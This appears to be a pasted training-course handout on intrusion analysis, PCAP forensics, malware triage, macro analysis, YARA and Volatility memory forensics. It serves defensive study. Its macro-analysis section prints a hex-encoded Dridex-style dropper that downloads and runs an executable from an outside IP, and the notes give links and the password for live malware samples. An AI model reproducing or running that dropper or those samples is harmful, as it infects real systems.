  1034. (new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=LBn64cyA", "c:\ps\u_ex1104.log")
  1035.  
  1036.  
  1037.  
  1038.  
  1039.  
  1040.  
  1041.  
  1042.  
  1043. ###############################################
  1044. # Intrusion Analysis Using Windows PowerShell #
  1045. ###############################################
  1046.  
  1047. Download sample file http://pastebin.com/raw.php?i=ysnhXxTV into the c:\ps directory
  1048.  
  1049.  
  1050.  
  1051.  
  1052.  
  1053. (new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=ysnhXxTV", "c:\ps\CiscoLogFileExamples.txt")
  1054.  
  1055. Select-String 192.168.208.63 .\CiscoLogFileExamples.txt
  1056.  
  1057.  
  1058.  
  1059.  
  1060. The Select-String cmdlet searches for text and text patterns in input strings and files. You can use it like Grep in UNIX and Findstr in Windows.
  1061.  
  1062. Select-String 192.168.208.63 .\CiscoLogFileExamples.txt | select line
  1063.  
  1064.  
  1065.  
  1066.  
  1067. To see how many connections are made when analyzing a single host, the output from that can be piped to another command: Measure-Object.
  1068.  
  1069. Select-String 192.168.208.63 .\CiscoLogFileExamples.txt | select line | Measure-Object
  1070.  
  1071.  
  1072.  
  1073. To select all IP addresses in the file expand the matches property, select the value, get unique values and measure the output.
  1074.  
  1075. Select-String “\b(?:\d{1,3}\.){3}\d{1,3}\b” .\CiscoLogFileExamples.txt | select -ExpandProperty matches | select -ExpandProperty value | Sort-Object -Unique | Measure-Object
  1076.  
  1077.  
  1078.  
  1079. Removing Measure-Object shows all the individual IPs instead of just the count of the IP addresses. The Measure-Object command counts the IP addresses.
  1080.  
  1081. Select-String “\b(?:\d{1,3}\.){3}\d{1,3}\b” .\CiscoLogFileExamples.txt | select -ExpandProperty matches | select -ExpandProperty value | Sort-Object -Unique
  1082.  
  1083.  
  1084. In order to determine which IP addresses have the most communication the last commands are removed to determine the value of the matches. Then the group command is issued on the piped output to group all the IP addresses (value), and then sort the objects by using the alias for Sort-Object: sort count –des.
  1085. This sorts the IP addresses in a descending pattern as well as count and deliver the output to the shell.
  1086.  
  1087. Select-String “\b(?:\d{1,3}\.){3}\d{1,3}\b” .\CiscoLogFileExamples.txt | select -ExpandProperty matches | select value | group value | sort count -des
  1088.  
  1089.  
  1090.  
  1091.  
  1092. This will get the setting for logs in the windows firewall which should be enabled in GPO policy for analysis.
  1093. The command shows that the Firewall log is at:
  1094. %systemroot%\system32\LogFiles\Firewall\pfirewall.log, in order to open the file PowerShell will need to be run with administrative privileges.
  1095.  
  1096.  
  1097. First step is to get the above command into a variable using script logic.
  1098. Thankfully PowerShell has a built-in integrated scripting environment, PowerShell.ise.
  1099.  
  1100. netsh advfirewall show allprofiles | Select-String FileName | select -ExpandProperty line | Select-String “%systemroot%.+\.log" | select -ExpandProperty matches | select -ExpandProperty value | sort –uniq
  1101.  
  1102.  
  1103. ##############################################
  1104. # Parsing Log files using windows PowerShell #
  1105. ##############################################
  1106.  
  1107. Download the sample IIS log http://pastebin.com/LBn64cyA
  1108.  
  1109.  
  1110. (new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=LBn64cyA", "c:\ps\u_ex1104.log")
  1111.  
  1112. Get-Content ".\*log" | ? { ($_ | Select-String "WebDAV")}
  1113.  
  1114.  
  1115.  
  1116. The above command would give us all the WebDAV requests.
  1117.  
  1118. To filter this to a particular user name, use the below command:
  1119.  
  1120. Get-Content ".\*log" | ? { ($_ | Select-String "WebDAV") -and ($_ | Select-String "OPTIONS")}
  1121.  
  1122.  
  1123.  
  1124. Some more options that will be more commonly required :
  1125.  
  1126. For Outlook Web Access : Replace WebDAV with OWA
  1127.  
  1128. For EAS : Replace WebDAV with Microsoft-server-activesync
  1129.  
  1130. For ECP : Replace WebDAV with ECP
  1131.  
  1132.  
  1133.  
  1134. To find out the count of the EWS request we can go ahead and run the below command
  1135.  
  1136. (Get-Content ".\*log" | ? { ($_ | Select-String "WebDAV") -and ($_ | Select-String "Useralias")}).count
  1137.  
  1138.  
  1139.  
  1140. ########################
  1141. # Day 2: PCAP Analysis #
  1142. ########################
  1143. #################
  1144. # PCAP Analysis #
  1145. #################
  1146. cd /home/malware/Desktop/Browser\ Forensics
  1147.  
  1148. ls | grep pcap
  1149.  
  1150. perl chaosreader.pl suspicious-time.pcap
  1151.  
  1152. firefox index.html
  1153.  
  1154. cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)"
  1155.  
  1156. cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)" | awk '{print $4, $5, $6}' | sort | uniq -c | sort -nr
  1157.  
  1158. sudo tshark -i eth0 -r suspicious-time.pcap -qz io,phs
  1159.  
  1160.  
  1161. for i in session_00[0-9]*.www.html; do srcip=`cat "$i" | grep 'www:\ ' | awk '{print $2}' | cut -d ':' -f1`; dstip=`cat "$i" | grep 'www:\ ' | awk '{print $4}' | cut -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | sort -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host"; done | sort -u
  1162.  
  1163.  
  1164.  
  1165.  
  1166.  
  1167. #############################
  1168. # PCAP Analysis with tshark #
  1169. #############################
  1170. tshark -r suspicious-time.pcap | grep 'NB.*20\>' | sed -e 's/<[^>]*>//g' | awk '{print $3,$4,$9}' | sort -u
  1171.  
  1172.  
  1173. tshark -r suspicious-time.pcap | grep 'NB.*1e\>' | sed -e 's/<[^>]*>//g' | awk '{print $3,$4,$9}' | sort -u
  1174.  
  1175.  
  1176. tshark -r suspicious-time.pcap arp | grep has | awk '{print $3," -> ",$9}' | tr -d '?'
  1177.  
  1178.  
  1179. tshark –r suspicious-time.pcap -Tfields -e “eth.src” | sort | uniq
  1180.  
  1181.  
  1182. tshark -r suspicious-time.pcap -R "browser.command==1" -Tfields -e "ip.src" -e "browser.server" | uniq
  1183.  
  1184. tshark -r suspicious-time.pcap -Tfields -e "eth.src" | sort |uniq
  1185.  
  1186. tshark -r suspicious-time.pcap -qz ip_hosts,tree
  1187.  
  1188. tshark -r suspicious-time.pcap -R "http.request" -Tfields -e "ip.src" -e "http.user_agent" | uniq
  1189.  
  1190. tshark -r suspicious-time.pcap -R "dns" -T fields -e "ip.src" -e "dns.flags.response" -e "dns.qry.name"
  1191.  
  1192.  
  1193. whois rapidshare.com.eyu32.ru
  1194.  
  1195. whois sploitme.com.cn
  1196.  
  1197.  
  1198. tshark -r suspicious-time.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}'
  1199.  
  1200. tshark -r suspicious-time.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' -e google -e 'honeynet.org'
  1201.  
  1202. tshark -r suspicious-time.pcap -qz http_req,tree
  1203.  
  1204. tshark -r suspicious-time.pcap -R "data-text-lines contains \"<script\"" -T fields -e frame.number -e ip.src -e ip.dst
  1205.  
  1206. tshark -r suspicious-time.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' | grep 10.0.3.15 | sed -e 's/\?[^cse].*/\?\.\.\./g'
  1207.  
  1208.  
  1209.  
  1210. ######################################
  1211. # PCAP Analysis with forensicPCAP.py #
  1212. ######################################
  1213. cd ~/Desktop
  1214. wget https://raw.githubusercontent.com/madpowah/ForensicPCAP/master/forensicPCAP.py
  1215. sudo easy_install cmd2
  1216.  
  1217. python forensicPCAP.py Browser\ Forensics/suspicious-time.pcap
  1218.  
  1219. ForPCAP >>> help
  1220.  
  1221.  
  1222. Prints stats about PCAP
  1223. ForPCAP >>> stat
  1224.  
  1225.  
  1226. Prints all DNS requests from the PCAP file. The id before the DNS is the packet's id which can be use with the "show" command.
  1227. ForPCAP >>> dns
  1228.  
  1229. ForPCAP >>> show
  1230.  
  1231.  
  1232. Prints all destination ports from the PCAP file. The id before the DNS is the packet's id which can be use with the "show" command.
  1233. ForPCAP >>> dstports
  1234.  
  1235. ForPCAP >>> show
  1236.  
  1237.  
  1238. Prints the number of ip source and store them.
  1239. ForPCAP >>> ipsrc
  1240.  
  1241.  
  1242. Prints the number of web's requests and store them
  1243. ForPCAP >>> web
  1244.  
  1245.  
  1246. Prints the number of mail's requests and store them
  1247. ForPCAP >>> mail
  1248.  
  1249.  
  1250.  
  1251.  
  1252.  
  1253. ############################
  1254. # Day 3: Malware Analysis #
  1255. ############################
  1256.  
  1257.  
  1258. ############################
  1259. # Download the Analysis VM #
  1260. ############################
  1261. https://s3.amazonaws.com/StrategicSec-VMs/StrategicsecUbuntu-v3.zip
  1262. user: malware
  1263. pass: malware
  1264.  
  1265.  
  1266. - Log in to your Ubuntu system with the username 'malware' and the password 'malware'.
  1267.  
  1268. - After logging please open a terminal window and type the following commands:
  1269.  
  1270. cd Desktop/
  1271.  
  1272.  
  1273. - This is actual Malware (remmeber to run it in a VM - the password to extract it is 'infected':
  1274.  
  1275. wget https://s3.amazonaws.com/StrategicSec-Files/MalwareAnalysis/malware-password-is-infected.zip
  1276. wget https://s3.amazonaws.com/StrategicSec-Files/analyse_malware.py
  1277.  
  1278. unzip malware-password-is-infected.zip
  1279. infected
  1280.  
  1281. file malware.exe
  1282.  
  1283. mv malware.exe malware.pdf
  1284.  
  1285. file malware.pdf
  1286.  
  1287. mv malware.pdf malware.exe
  1288.  
  1289. hexdump -n 2 -C malware.exe
  1290.  
  1291. ***What is '4d 5a' or 'MZ'***
  1292. Reference:
  1293. http://www.garykessler.net/library/file_sigs.html
  1294.  
  1295.  
  1296. objdump -x malware.exe
  1297.  
  1298. strings malware.exe
  1299.  
  1300. strings --all malware.exe | head -n 6
  1301.  
  1302. strings malware.exe | grep -i dll
  1303.  
  1304. strings malware.exe | grep -i library
  1305.  
  1306. strings malware.exe | grep -i reg
  1307.  
  1308. strings malware.exe | grep -i hkey
  1309.  
  1310. strings malware.exe | grep -i hku
  1311.  
  1312. - We didn't see anything like HKLM, HKCU or other registry type stuff
  1313.  
  1314. strings malware.exe | grep -i irc
  1315.  
  1316. strings malware.exe | grep -i join
  1317.  
  1318. strings malware.exe | grep -i admin
  1319.  
  1320. strings malware.exe | grep -i list
  1321.  
  1322.  
  1323. - List of IRC commands: https://en.wikipedia.org/wiki/List_of_Internet_Relay_Chat_commands
  1324.  
  1325. sudo apt-get install -y python-pefile
  1326.  
  1327. vi analyse_malware.py
  1328.  
  1329. python analyse_malware.py malware.exe
  1330.  
  1331.  
  1332.  
  1333.  
  1334. Building a Malware Scanner
  1335. --------------------------
  1336.  
  1337. mkdir ~/Desktop/malwarescanner
  1338.  
  1339. cd ~/Desktop/malwarescanner
  1340.  
  1341. wget https://github.com/jonahbaron/malwarescanner/archive/master.zip
  1342.  
  1343. unzip master.zip
  1344.  
  1345. cd malwarescanner-master/
  1346.  
  1347. python scanner.py -h
  1348.  
  1349. cat strings.txt
  1350.  
  1351. cat hashes.txt
  1352.  
  1353. mkdir ~/Desktop/malcode
  1354.  
  1355. cp ~/Desktop/malware.exe ~/Desktop/malcode
  1356.  
  1357. python scanner.py -H hashes.txt -D /home/malware/Desktop/malcode/ strings.txt
  1358.  
  1359. cp ~/Desktop/
  1360.  
  1361.  
  1362.  
  1363. #####################################################
  1364. # Analyzing Macro Embedded Malware #
  1365. # Reference: #
  1366. # https://jon.glass/analyzes-dridex-malware-p1/ #
  1367. #####################################################
  1368. cp ~/Desktop/
  1369.  
  1370. - Create a FREE account on:
  1371. https://malwr.com/account/signup/
  1372.  
  1373. - Grab the malware from:
  1374. https://malwr.com/analysis/MzkzMTk3MzBlZGQ2NDRhY2IyNTc0MGI5MWQwNzEwZmQ/
  1375.  
  1376. file ~/Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin
  1377.  
  1378. cat ~/Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin
  1379.  
  1380.  
  1381.  
  1382.  
  1383. sudo pip install olefile
  1384.  
  1385. mkdir ~/Desktop/oledump
  1386.  
  1387. cd ~/Desktop/oledump
  1388.  
  1389. wget http://didierstevens.com/files/software/oledump_V0_0_22.zip
  1390.  
  1391. unzip oledump_V0_0_22.zip
  1392.  
  1393. cp ~/Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin .
  1394.  
  1395. mv f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin 064016.doc
  1396.  
  1397. python oledump.py 064016.doc
  1398.  
  1399. python oledump.py 064016.doc -s A4 -v
  1400.  
  1401. - From this we can see this Word doc contains an embedded file called editdata.mso which contains seven data streams.
  1402. - Three of the data streams are flagged as macros: A3:’VBA/Module1′, A4:’VBA/Module2′, A5:’VBA/ThisDocument’.
  1403.  
  1404.  
  1405. python oledump.py 064016.doc -s A5 -v
  1406.  
  1407. - As far as I can tell, VBA/Module2 does absolutely nothing. These are nonsensical functions designed to confuse heuristic scanners.
  1408.  
  1409.  
  1410. python oledump.py 064016.doc -s A3 -v
  1411.  
  1412. - Look for "GVhkjbjv" and you should see:
  1413.  
  1414. 636D64202F4B20706F7765727368656C6C2E657865202D457865637574696F6E506F6C69637920627970617373202D6E6F70726F66696C6520284E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E74292E446F776E6C6F616446696C652827687474703A2F2F36322E37362E34312E31352F6173616C742F617373612E657865272C272554454D50255C4A494F696F646668696F49482E63616227293B20657870616E64202554454D50255C4A494F696F646668696F49482E636162202554454D50255C4A494F696F646668696F49482E6578653B207374617274202554454D50255C4A494F696F646668696F49482E6578653B
  1415.  
  1416. - Take that long blob that starts with 636D and finishes with 653B and paste it in:
  1417. http://www.rapidtables.com/convert/number/hex-to-ascii.htm
  1418.  
  1419.  
  1420.  
  1421.  
  1422. ##############
  1423. # Yara Ninja #
  1424. ##############
  1425. sudo apt-get remove -y yara
  1426.  
  1427. wget https://github.com/plusvic/yara/archive/v3.4.0.zip
  1428.  
  1429. sudo apt-get -y install libtool
  1430.  
  1431. unzip v3.4.0.zip
  1432.  
  1433. cd yara-3.4.0
  1434.  
  1435. ./bootstrap.sh
  1436.  
  1437. ./configure
  1438.  
  1439. make
  1440.  
  1441. sudo make install
  1442.  
  1443. yara -v
  1444.  
  1445. cd ..
  1446.  
  1447. wget https://github.com/Yara-Rules/rules/archive/master.zip
  1448.  
  1449. unzip master.zip
  1450.  
  1451. cd ~/Desktop
  1452.  
  1453. yara rules-master/packer.yar malcode/malware.exe
  1454.  
  1455.  
  1456. Places to get more Yara rules:
  1457. ------------------------------
  1458. https://malwareconfig.com/static/yaraRules/
  1459. https://github.com/kevthehermit/YaraRules
  1460. https://github.com/VectraThreatLab/reyara
  1461.  
  1462.  
  1463.  
  1464. Yara rule sorting script:
  1465. -------------------------
  1466. https://github.com/mkayoh/yarasorter
  1467.  
  1468.  
  1469.  
  1470. cd ~/Desktop/rules-master
  1471. for i in $( ls --hide=master.yar ); do echo include \"$i\";done > master.yar
  1472. cd ~/Desktop/
  1473. yara rules-master/master.yar malcode/malware.exe
  1474.  
  1475.  
  1476.  
  1477.  
  1478.  
  1479.  
  1480.  
  1481.  
  1482.  
  1483.  
  1484. Here is a 2 million sample malware DB created by Derek Morton that you can use to start your DB with:
  1485. http://derekmorton.name/files/malware_12-14-12.sql.bz2
  1486.  
  1487.  
  1488. Malware Repositories:
  1489. http://malshare.com/index.php
  1490. http://www.malwareblacklist.com/
  1491. http://www.virusign.com/
  1492. http://virusshare.com/
  1493. http://www.tekdefense.com/downloads/malware-samples/
  1494.  
  1495.  
  1496.  
  1497.  
  1498. ###############################
  1499. # Creating a Malware Database #
  1500. ###############################
  1501.  
  1502. Creating a malware database (sqlite)
  1503. ------------------------------------
  1504. sudo apt-get install -y python-simplejson python-simplejson-dbg
  1505. wget https://malwarecookbook.googlecode.com/svn/trunk/4/4/avsubmit.py
  1506. wget https://s3.amazonaws.com/StrategicSec-Files/MalwareAnalysis/malware-password-is-infected.zip
  1507. unzip malware-password-is-infected.zip
  1508. infected
  1509. python avsubmit.py --init
  1510. python avsubmit.py -f malware.exe -e
  1511.  
  1512.  
  1513.  
  1514.  
  1515.  
  1516. Creating a malware database (mysql)
  1517. -----------------------------------
  1518. - Step 1: Installing MySQL database
  1519. - Run the following command in the terminal:
  1520.  
  1521. sudo apt-get install mysql-server
  1522.  
  1523. - Step 2: Installing Python MySQLdb module
  1524. - Run the following command in the terminal:
  1525.  
  1526. sudo apt-get build-dep python-mysqldb
  1527. sudo apt-get install python-mysqldb
  1528.  
  1529. Step 3: Logging in
  1530. Run the following command in the terminal:
  1531.  
  1532. mysql -u root -p (set a password of 'malware')
  1533.  
  1534. - Then create one database by running following command:
  1535.  
  1536. create database malware;
  1537.  
  1538. exit;
  1539.  
  1540. wget https://raw.githubusercontent.com/dcmorton/MalwareTools/master/mal_to_db.py
  1541.  
  1542. vi mal_to_db.py (fill in database connection information)
  1543.  
  1544. python mal_to_db.py -i
  1545.  
  1546. python mal_to_db.py -f malware.exe -u
  1547.  
  1548.  
  1549. mysql -u root -p
  1550. malware
  1551.  
  1552. mysql> use malware;
  1553.  
  1554. select id,md5,sha1,sha256,time FROM files;
  1555.  
  1556. mysql> quit;
  1557.  
  1558.  
  1559.  
  1560.  
  1561.  
  1562.  
  1563.  
  1564.  
  1565.  
  1566. ###################
  1567. # Memory Analysis #
  1568. ###################
  1569. cd /home/malware/Desktop/Banking\ Troubles/Volatility
  1570.  
  1571. python volatility
  1572. python volatility pslist -f ../hn_forensics.vmem
  1573. python volatility connscan2 -f ../hn_forensics.vmem
  1574. python volatility memdmp -p 888 -f ../hn_forensics.vmem
  1575. python volatility memdmp -p 1752 -f ../hn_forensics.vmem
  1576. ***Takes a few min***
  1577. strings 1752.dmp | grep "^http://" | sort | uniq
  1578. strings 1752.dmp | grep "Ahttps://" | uniq -u
  1579. cd ..
  1580. foremost -i ../Volatility/1752.dmp -t pdf -o output/pdf2
  1581. cd /home/malware/Desktop/Banking\ Troubles/foremost-1.5.7/output/pdf2/
  1582. cat audit.txt
  1583. cd pdf
  1584. ls
  1585. grep -i javascript *.pdf
  1586.  
  1587.  
  1588.  
  1589. cd /home/malware/Desktop/Banking\ Troubles/foremost-1.5.7/output/pdf5/pdf
  1590. wget http://didierstevens.com/files/software/pdf-parser_V0_6_4.zip
  1591. unzip pdf-parser_V0_6_4.zip
  1592. python pdf-parser.py -s javascript --raw 00600328.pdf
  1593. python pdf-parser.py --object 11 00600328.pdf
  1594. python pdf-parser.py --object 1054 --raw --filter 00600328.pdf > malicious.js
  1595.  
  1596. cat malicious.js
  1597.  
  1598.  
  1599. *****Sorry - no time to cover javascript de-obfuscation today*****
  1600.  
  1601.  
  1602. cd /home/malware/Desktop/Banking\ Troubles/Volatility/
  1603. python volatility files -f ../hn_forensics.vmem > files
  1604. cat files | less
  1605. python volatility malfind -f ../hn_forensics.vmem -d out
  1606. ls out/
  1607. python volatility hivescan -f ../hn_forensics.vmem
  1608. python volatility printkey -o 0xe1526748 -f ../hn_forensics.vmem Microsoft "Windows NT" CurrentVersion Winlogon
  1609. for file in $(ls *.dmp); do echo $file; strings $file | grep bankofamerica; done
Add Comment
Please, Sign In to add comment